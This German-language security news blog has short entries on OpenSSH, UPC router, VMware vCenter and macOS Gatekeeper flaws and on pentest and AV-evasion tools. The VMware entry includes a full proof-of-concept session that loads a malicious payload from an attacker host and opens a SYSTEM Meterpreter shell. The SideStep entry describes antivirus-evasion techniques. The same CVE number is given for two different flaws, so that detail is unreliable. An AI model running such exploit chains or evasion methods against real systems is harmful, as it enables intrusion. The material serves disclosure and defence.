15 Jan

777 – OpenSSH-Vulnerability leaked geheime Schlüssel

777-triple-seven-opensshTriple Seven – (CVE-2016-0777 und -0778) – OpenSSH Vulnerability

Eine seit 2010 standardmäßig aktivierte und unfertige OpenSSH Option führt dazu das Server die geheimen Schlüssel der sich verbindenden Benutzern auslesen kann.
Updates, zum schließen der Lücke, wurden bereits veröffentlicht.

Aufgrund der CVE Nummer CVE-2016-0777 und -0778 hat diese Schwachstellen den Spitznamen „Triple-Seven“ bekommen.
Betroffen sind alle Open SSH-Versionen von 5.4 – 7.1. Update 7.1p2 schließt die Lücke.

Hier der Security Advisor mit Proof of Concept  von Qualys

14 Jan

Achtung UPC Kunden – Standard WLAN Passwörter leicht zu hacken

hackedDer niederländische Sicherheitsforscher Peter Geissler hat ein Tool veröffentlicht mit dem sich die Standard Passwörter von einigen UPC Modems leicht berechnen lassen.

UPC Kunden sollten ihre WLAN Kennwörter so schnell wie möglich ändern.

Fehler:
Das WPA2 Kennwort bei UPC Modems wird aus der geheimen Seriennummer des Modems generiert und genau hier hat UPC ordentlich gepatzt. Die Seriennummer korrespondiert unerfreulicherweise leider mit der ESSID welche öffentlich einsehbar ist.
Dadurch lässt sich das Kennwort mit wenig aufwand berechnen.

UPC hat begonnen seine Kunden per Mail zu informieren.

Hier finden sie die Anleitung zum ändern des WLAN Kennworts der verschiednen Modems von UPC:
Link

13 Jan

ChameleonMini – NFC/RFID Pentesting Tool

Neues NFC / RFID Security und Pentest Tool.
Die frei programmierbare Plattform kann perfekte Klone von verschiedenen bestehenden kommerziellen Smartcards , einschließlich kryptographische Funktionen, erstellen.
Es kann für verschiedenste RFID und NFC Angriffsszenarien verwendet werden, z.B. replay und relay attacks sowie state restoration attacks oder NFC sniffing.

mehr unter: https://www.kickstarter.com/projects/1980078555/chameleonmini-a-versatile-nfc-card-emulator-and-mo

03 Okt

Kritische Lücke in VMware vCenter Server und ESXi

LOGO1

Advisory ID: VMSA-2015-0007
CVE Numbers: CVE-2015-5177 CVE-2015-2342 CVE-2015-1047

CVE-2015-5177 – kritisch
Fehler im JMX-RMI-Service im vCenter Server. – Remote Code Execution
Hier ist bereits ein Metasploit Modul verfügbar.

Proof of Concept:
root@Whack:/opt/mjet# nmap -sS 1.1.1.2 -p 9875 –script=/usr/share/nmap/scripts/rmi-dumpregistry.nse
Starting Nmap 6.47 ( http://nmap.org ) at 2015-04-15 16:56 BST
Nmap scan report for 1.1.1.2
Host is up (0.00036s latency).
PORT STATE SERVICE
9875/tcp open java-rmi
| rmi-dumpregistry:
| jmxrmi
| javax.management.remote.rmi.RMIServerImpl_Stub
| @1.1.1.2:50966
| extends
| java.rmi.server.RemoteStub
| extends
|_ java.rmi.server.RemoteObject
MAC Address: 00:0C:29:D1:00:30 (VMware)
root@Whack:/opt/mjet# java -jar mjet.jar -t 1.1.1.2 -p 9875 -u http://1.1.1.1:8080/TArDcls4aeQZVWl
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
--------------------------------------------------- 
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://1.1.1.2:9875/jmxrmi ...
[+] Connected: rmi://1.1.1.2 16
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://1.1.1.1:8080/TArDcls4aeQZVWl
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: drmwfzvo:name=NApCjRCB,id=gsKsVVHK
[+] Invoking: metasploit.Metasploit.run()
[+] Done
Metasploit Shell
-------------------------
2015-02-24 10:11:44 +0000 S:0 J:3 msf exploit(java_mlet_server) >
[*] Using URL: http://1.1.1.1:8080/TArDcls4aeQZVWl
[*] Server started.
[*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl
[*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl/
[*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar
[*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar
[*] Sending stage (30355 bytes) to 1.1.1.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 1.1.1.2:50456) at 2015-02-24 10:12:32 +0000
 
2015-02-24 10:14:10 +0000 S:1 J:3 msf exploit(java_mlet_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: SYSTEM

CVE-2015-5177:
Fehler in der OpenSLP-Funktion – Remote Code Execution
Betroffene Versionen 5.0, 5.1 und 5.5

CVE-2015-1047:
Der vpxd Service bei den Versionen 5.0,5.1 und 5.5 ist für DoS-Attacken anfällig.

Entsprechende Updates sind bei VMware bereits verfügbar.

02 Okt

Evil FOCA – Network Attack Tool

Evil FOCA ist ein Windows Tool zum überprüfen der Sicherheit von IPV4 und IPV6 Netzen für Pentester und Auditoren.

Folgende Attacken sind möglich:

  • MITM über IPV4 mit ARP spoofing und DHCP ACK Injections.
  • MITM über IPV6 mit Neighbor Advertisment Spooing, SLAAC attacks und fake DHCPv6
  • DoS auf IPV4 mit ARP Spoofing
  • DoS auf IPV6 mit SLAAC DoS
  • DNS Hijacking

Evil FOCA scannt automatisch das gesammte Netz, alle Geräte und deren Netzwerkinterfaces, und fügt alle IPV6, IPV4 und Physische Adressen in ein intuitives Interface ein.

Evil Foca is released under the GNU Public License 3.0
Link

01 Okt

Bypass Apple’s Gatekeeper – Malware auf den Mac schmuggeln

Der leitende Sicherheitsforscher Wardle hat den Sicherheitsmechanismus „Gatekeeper“ von Apples Betriebssystem OS X umgangen und unsignierten Code ausgeführt.

Der Gatekeeper überprüft Programme vor der Installation und prüft, ob diese aus einer vertrauenswürdigen Quelle stammen. Wenn das der Fall ist, sind diese entsprechend signiert und das Programm kann installiert werden. Wardle zeigte jedoch auf, dass man diese Überprüfung vergleichsweise einfach umgehen kann.

Als Einfallstor setzte Wardle auf eine von Apple als vertrauenswürdig eingestufte Binär-Datei. In seinem Test packte er diese in ein Apple Disk Image, welche er mit einer weiteren, nicht-signierten Anwendung auffüllte.

Beim Installieren hat Gatekeeper die signierte Binär-Datei als vertrauenswürdig eingestuft und im gleichen Zuge auch die nicht-signierte Anwendung durchgewinkt und ausgeführt. Das passiert, weil Gatekeeper nur die erste Anwendung prüft und das folgende nicht mehr.

(teilw. ct anw)

04 Jul

SideStep: AV Evasion Tool

SideStep is a nice tool to bypass anti-virus software. The tool generates Metasploit payloads encrypted using the CryptoPP library, and uses several other techniques to evade AV.

SideStep generates Meterpreter shellcode, randomly generates an encryption key, and then encrypts the shellcode using AES-128bit with the random key. All variables and function names are also randomly generated.

In addition, to encrypting the shellcode and assigning random names, it also generates a configurable number of random variables with configurable value lengths. Surprisingly, this can also help evade AV.

To evade AV sandboxes, I implemented a function that checks the current time, and then loops until a configurable number of seconds have passed since the current time. As an added small time function, I have added support for generating 1024 or 2048bit DH parameters. I chose these methods as I’ve read that some AV hook sleep function calls.

SideStep can also be configured to strip debugging and other symbol information from the final executable and then randomly encode the assembly instructions using peCloak.

Source: GitHub
More info: Here..

11 Jun

Stealing iCloud Passwords made easy!

IOS-Mail.app Inject-Kit

jansoucek found a bug in the Apple IOS 8.3 Mail.app, resulting in „meta http-equiv=refresh HTML tag in email messages not being ignored. This bug allows remote HTML content to be loaded, replacing the content of the original email message. With simple HTML and CSS its possible to build a functional password „collector“.

This bug was published to Apple on 15.01.2015 but the fix is not delivered till now

Source and Proof of concept code is available on github.

Demo:

06 Jun

Let´s Encrypt: Freies SSL für Alle

Let´s Encrypt ist eine freie, automatisierte und offene certificate authority (CA) und frei verfügbar für alle.
Gestartet und betrieben wird das ganze Mitte 2015 von der Internet Research Group (ISRG).

Wie funktioniert das ganze?
Es könnte nicht einfacher sein:
Um unter Linux für seinen Webserver SSL zu aktivieren reicht wohl folgendes aus:

$ sudo apt-get install lets-encrypt

$ lets-encrypt example.com

mehr unter letsencrypt.org

05 Jun

Exploit Pack: Pentesting-Tool


ExploitPack kommt mit einer übersichtlichen Benutzeroberfläche und bietet derzeit ca. 300 Exploits
Mit ExploitPack ist es möglich Systeme auf Sicherheitslücken zu untersuchen und in diese einzudringen.
Es stehen ca. 300 Exploits für Windows, Linux und Mac OS X zur Verfügung.
Und natürlich ist es möglich eigene Angriffs Module dafür zu entwerfen.

Noch kein Ersatz für Metasploit, jedoch sehr vielversprechend.
Platform: Linux, Windows, OS X – min. Java8 – GPLv3
Url: exploitpack.com